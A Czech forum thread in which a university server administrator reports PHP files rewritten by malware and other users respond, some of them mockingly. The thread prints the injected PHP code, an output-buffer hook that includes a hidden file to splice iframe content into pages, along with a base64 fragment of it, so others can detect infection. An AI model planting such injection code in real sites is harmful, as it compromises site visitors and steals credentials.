Autor Zpráva
peta
Profil
Na nasem serveru se spustil nejaky program, asi, ktery prepisuje vsechny PHP, ktera maji prava zapisu
rwx rWx rWx
(jedno z tech velkych W)
Zatim to zkoumam, upozornuji vsak na to. Prida to php kod, ktery dekoduje JS kod pro vlozeni iframu.
Zrejme to bude prace jednoho z tech lidi ,co se pltal v sekci JS, jak roztahnout okno na celou sirku, protoze to vyuziva presne ten princip a vim, jak jsou nasinci sikovni :)

Blizsi informace
Modifikace php nastala 26.11.2008 20:34
vlozi to php script:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS[' sh_no']=1;if(file_exists('/var/www/html/newsys/aliases/ubk/curras/ESP/ cmsimple/languages/mdl_utf.php')){include_once('/var/www/html/newsys/a liases/ubk/curras/ESP/cmsimple/languages/mdl_utf.php');if(function_exi sts('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode') ){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v', substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1 ;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(su bstr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else {return gml().$c;}}ob_start('dgobh');}}}


Cili to spousti nejaky PHP z naseho adresare, kam nemam pristup, zavirovany program je asi PHP CMS made simple, sekce languages.
ninja
Profil
peta: a vas server je co? Nejaky hosting?
peta
Profil
Po prozkoumani toho includovaneho jsem zjistil, ze to dela vse mozne i nemozne. Zjistuje to hesla, adresy programu, nazvy souboru, typ serveru...
Pouziva to sice kodovani typu:
FE0323A9039ADD2978BF5B49550572C7C(); $R3CB9CDAED257453CFA56B9EF81B44C57 = 1; }
Ale to na mne neplati, ze :)

Jako jednoduchou pomoc doporucuji prenastavit prava na
rwx r.x r.x a do napadnuteho souboru, ktery to includuje napsat nejakou hlasku ve smyslu:

Pokud vidite tento text napiste:
spravce aplikace zde = mail
uzivatel = pokuste se vyhledat kontakt na spravce a oznemte mu to.

ninja
To je proste server, zalozeny na linuxu. Ber to jako oznameni. Treba je to stary virus, ale clovek nikdy nevi. Zachranit, co se da, doporucit zmenit hesla a opravneni souboru.
Mike8748
Profil
peta
nejak nechapu proc nam to vlastne oznamujes. pokud tohle beres jako upozorneni na existenci "viru" tak by bylo dobry poskytnout nejaky fakticky informace coz si v podstate neudelal

>> nastavit prava na rwx r.x r.x
kdyz uz tak rw.r..r.. nevidim duvod proc by ty skripty meli mit pravo na vykonavani (kdyz jsou podle tebe tak nebezpecny)
peta
Profil
Mike8748
:))) zas chytrak ala chamurapi. Rekni, co bys rad vedel? Napsal jsem zhruba vsechno dulezite, co se mi podarilo s mymi pravy na serveru vystourat. Cili
* ze se tam nejak vlozil php kod
* ktery spousti php kod ulozeny v nejakem adresari (jak se tam dostal nebo jestli to tam nahral uzivatel-spravce adresare, to nevim)
* a ten druhej php kod odchytava ruzna hesla
* kdy se udalost stala, 26.11. kolem 20:00, podle casu modifikace mych php souboru
* a ze se to stalo jen u typu PHP, ktery mel povolene prava W pro vsechny 3 skupiny
* typ serveru linux, muzu rici, ze nedavno (rok zpet) nainstalovane nove verze php sql
* maximalne muzu pridat cas PHP kodu, ktery to pripsalo
base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl
abys mohl pouzit linuxove hledani

Podle toho se muze kazdy podivat u sebe a zkontrolovat, zda s tim nema tez problem.
Vic informaci spis nemam.
Medvídek
Profil
peta
No prostě si nafackuj, neukládej si heslo k ftp k sobě do počítače a nelez na porno warez servery !
Mastodont
Profil
peta
Tady u nás pod oknem se právě vydělala kočka. To je zpráva s podobnou informační hodnotou jako ta tvoje.
Mike8748
Profil
peta
pokud spravci serveru na slu umi aspon trosku svoji praci, tak pro ne nebude problem zjistit kdo z UBK vlastni/vytvoril danou slozku curras pripadne zminene podslozky a najit "vinika"
jinak, jde o CMSimple, a ne o CMS Made Simple
jelikoz to evidentne "napadlo" vice tvyh souboru tak by me zajimalo proc jim proboha nastavujes pravo zapisu? jeste k tomu pro vsechny 3 skupiny
docela by me zajimalo co je obsahem toho iframu :)

me to prijde jako ze si nejaky studentik trosku hral no


ninja
nejde o webhosting, ale server Slezske univerzity v Opave :)
peta
Profil
Medvídek :) Vzhledem k tomu, co jsem napsal, ze s mymi pravy vic zjistit nemuzu, myslim, ze by pres me heslo mohl nekdo spustit progrem, ktery prepise soubory, do kterych nemam pravo zapisovat? :)

Mastodont
Tak to nahlas moderatorum, at to smazou.

Mike8748
Jeste bych dodal, co jsem psal, k tem odrazkam...
* zminena sifrovana cast do base64 se dekoduje jako, viz prvni zprava
a z toho je mozna dulezita cesta, odkud se to includuje
/var/www/html/newsys/aliases/ubk/curras/ESP/ cmsimple/languages/mdl_utf.php
a domnivam se, ze zbytek toho scriptu, co provadi to odchytavani hesel je v programu cmsimple, coz by mohl byt cms-made-simple. Ted je otazka, jestli to nekdo nasoukal pres ten CMS nebo se naboural na server. To uz necham na nasich adminech, kteri maji vetsi prava. Uz jenom ziskat zdroj k tomu zavirovanemu mdl_utf.php jsem musel pres jednoho z nich.

PS. Dokonce bych se domnival, ze to chce hlavne smazat ten clovek, ktery z toho muze mit prospech :)
bohyn
Profil
peta
Vzhledem k tomu, co jsem napsal, ze s mymi pravy vic zjistit nemuzu, myslim, ze by pres me heslo mohl nekdo spustit progrem, ktery prepise soubory, do kterych nemam pravo zapisovat? :)
Ty nemas pravo zapisu pres FTP ?

S. Dokonce bych se domnival, ze to chce hlavne smazat ten clovek, ktery z toho muze mit prospech :)
Kdyz to dokazal zapsat tak to dokaze i odstranit
peta
Profil
bohyn
Polozim ti jednoduchou otazku. Co vis o linuxu?
Protoze s tvych otazek mam pocit, ze se bavime o win.

V linuxu je admin a uzivatele. Admin nastavuje prava, kam uzivatele muzou a kam uz ne. Tyto prava se vztahuji pro vsechn akce uzivatele, vcetne FTP.
Cili, pokud se dostanu pres FTP do slozky
/home/Peta
muzu predpokladat, ze pokud mi to admin slesl nepovoli, pak pro mne slozka
/var/www/html/newsys/aliases/ubk/curras/ESP/
neexistuje. Tim padem zadny PHP a zadny FTP zapis do neceho neexistujiciho nelze provest?
Chci rici, ze nechapu tvuj dotaz 1 o FTP.

2 - nechapu vubec :) Ja mluvim o smazani tematu a ze o to predevsim bude usilovat autor viru a ten, co z toho ma prospech. Tim, ze na to brzo upozornuji mu marim praci a v dobe, kdy si to cte uz pulka lidi zmenila a uz si nestihl zcizit, co chtel.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: